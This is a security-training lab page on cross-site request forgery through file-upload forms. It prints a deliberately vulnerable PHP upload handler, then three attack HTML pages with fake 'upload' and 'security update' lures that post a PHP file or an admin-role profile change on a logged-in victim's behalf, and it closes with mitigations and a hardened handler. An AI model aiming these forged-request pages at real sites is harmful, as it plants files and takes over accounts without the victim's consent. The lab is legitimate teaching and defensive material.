Lab 3: CSRF via File Upload

CSRF attacks through file upload functionality

Difficulty: Medium

Lab Overview

This lab demonstrates CSRF vulnerabilities in file upload functionality. Because the upload handlers accept any POST request that arrives with the victim's session, an attacker's page can trick a logged-in user into uploading malicious files or performing unauthorized actions through the file upload forms.

Objective: Use file upload functionality to perform CSRF attacks and upload malicious content.

Vulnerable Code
// Vulnerable: No CSRF protection on file upload
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['upload_file'])) {
    $file_name = $_POST['file_name'] ?? '';
    $file_content = $_POST['file_content'] ?? '';
    
    // Process file upload without CSRF validation
    $_SESSION['uploaded_files'][] = [
        'name' => $file_name,
        'content' => $file_content,
        'uploaded_at' => date('Y-m-d H:i:s')
    ];
}

// Vulnerable: Malicious file upload
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['upload_malicious'])) {
    $malicious_content = $_POST['malicious_content'] ?? '';
    // Upload malicious content without validation
    $_SESSION['uploaded_files'][] = [
        'name' => 'malicious_file.php',
        'content' => $malicious_content,
        'type' => 'application/x-php'
    ];
}
Vulnerability Details
  • Type: CSRF via File Upload
  • Severity: High
  • Method: POST
  • Issue: No CSRF protection on file upload functionality
CSRF Attack Examples
  • file_upload_csrf.html - Basic file upload attack
  • malicious_upload_csrf.html - Malicious file upload
  • profile_update_csrf.html - Profile update via file
CSRF Attack Payloads

Create these malicious HTML files to test CSRF attacks:

1. File Upload CSRF (file_upload_csrf.html):
<html>
<body>
    <h1>Upload your document here!</h1>
    <form action="http://localhost/test/csrf/3.php" method="POST">
        <input type="hidden" name="upload_file" value="1">
        <input type="hidden" name="file_name" value="malicious.txt">
        <input type="hidden" name="file_type" value="text/plain">
        <input type="hidden" name="file_content" value="This is a malicious file uploaded via CSRF!">
        <input type="submit" value="Upload Document">
    </form>
</body>
</html>
2. Malicious File Upload CSRF (malicious_upload_csrf.html):
<html>
<body>
    <h1>Security update required!</h1>
    <form action="http://localhost/test/csrf/3.php" method="POST">
        <input type="hidden" name="upload_malicious" value="1">
        <input type="hidden" name="malicious_content" value="<?php echo 'Hacked!'; ?>">
        <input type="submit" value="Install Security Update">
    </form>
</body>
</html>
3. Profile Update via File CSRF (profile_update_csrf.html):
<html>
<body>
    <h1>Profile backup required!</h1>
    <form action="http://localhost/test/csrf/3.php" method="POST">
        <input type="hidden" name="update_via_file" value="1">
        <input type="hidden" name="profile_data" value="username=hacked_user email=hacker@evil.com role=admin balance=999999">
        <input type="submit" value="Backup Profile">
    </form>
</body>
</html>
Real-World Attack Scenarios
Mitigation Strategies
  • Implement CSRF tokens for all file upload operations
  • Validate file types and content before processing
  • Use secure file upload handling and storage
  • Implement proper file access controls and permissions
  • Use SameSite cookie attributes
  • Regular security testing and vulnerability assessments
  • Monitor for unusual file upload patterns and anomalies
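
The CSRF token, file type validation and SameSite items above, applied to this lab's upload handler. This is an added example, not the lab's own code; the csrf_token field and session key and the extension allow-list are assumptions.

```php
<?php
// Added example, not the lab's code. The csrf_token name and the
// extension allow-list are assumptions.

// SameSite=Strict keeps the session cookie off cross-site form posts.
// The lab runs on http://localhost; over HTTPS also set 'secure' => true.
session_set_cookie_params(['httponly' => true, 'samesite' => 'Strict']);
session_start();

// One unpredictable token per session, embedded in every upload form.
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

function csrf_token_valid(): bool
{
    $sent = $_POST['csrf_token'] ?? '';
    // Constant-time comparison; non-string input (arrays) is rejected.
    return is_string($sent) && hash_equals($_SESSION['csrf_token'], $sent);
}

// Gate every state-changing POST (upload_file, upload_malicious,
// update_via_file) before any handler runs.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !csrf_token_valid()) {
    http_response_code(403);
    exit('Invalid or missing CSRF token');
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['upload_file'])) {
    $name = $_POST['file_name'] ?? '';
    $content = $_POST['file_content'] ?? '';
    if (!is_string($name) || !is_string($content)) {
        http_response_code(400);
        exit('Malformed upload');
    }
    // Drop path components, then allow only known extensions (name check only).
    $name = basename($name);
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, ['txt', 'pdf', 'png', 'jpg'], true)) {
        http_response_code(400);
        exit('File type not allowed');
    }
    $_SESSION['uploaded_files'][] = [
        'name' => $name,
        'content' => $content,
        'uploaded_at' => date('Y-m-d H:i:s'),
    ];
}
```

Each upload form must carry the session's token in a hidden csrf_token field, written out through htmlspecialchars(). The three payload pages above cannot read that value cross-origin, so their POSTs are answered with 403.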